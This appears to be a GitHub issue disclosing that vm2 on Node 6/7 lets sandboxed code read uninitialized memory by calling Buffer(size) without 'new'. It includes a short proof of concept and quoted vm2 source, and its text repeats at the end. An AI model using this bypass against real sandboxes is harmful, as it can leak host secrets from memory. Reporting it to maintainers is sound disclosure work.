In node.js 6,7(I use node 7.11.0) and [email protected] (recent)
I tested uninitialized buffer problem using vm2, and it can be bypassed with this line of code
using Buffer(size); not new Buffer(size);
poc:
var {VM} = require("vm2");
var token = 'paSsWord!ASD, totally secret!';
var vm = new VM({
timeout: 1000
});
console.log('Buffer : '+ vm.run("Buffer(50);"));
console.log('new Buffer : '+ vm.run("new Buffer(50);"));result:
Buffer : P�B�M�;
new Buffer :
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L626
base.construct = (target, args, newTarget) => {
// Fixes buffer unsafe allocation for node v6/7
if (host.version < 8 && fnc === host.Buffer && 'number' === typeof args[0]) {
args[0] = new Array(args[0]).fill(0);
}
- With this code, I think vm2 supports better buffer initialization at vulnerable versions of node(like 6, 7)
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L963
const BufferMock = host.Object.create(null);
BufferMock.allocUnsafe = function allocUnsafe(size) {
return this.alloc(size);
};
// ...
// https://github.com/patriksimek/vm2/blob/master/lib/contextify.js#L979
const LocalBuffer = global.Buffer = Contextify.readonly(host.Buffer, BufferMock);
-
With this code, I think the Buffer() function can bypass the zero filling
-
I want to know why you leave global.Buffer that have non fill with zero's
In node.js 6,7(I use node 7.11.0) and [email protected] (recent)
I tested uninitialized buffer problem using vm2, and it can be bypassed with this line of code
using
Buffer(size);notnew Buffer(size);poc:
result:
With this code, I think the
Buffer()function can bypass the zero fillingI want to know why you leave
global.Bufferthat have non fill with zero's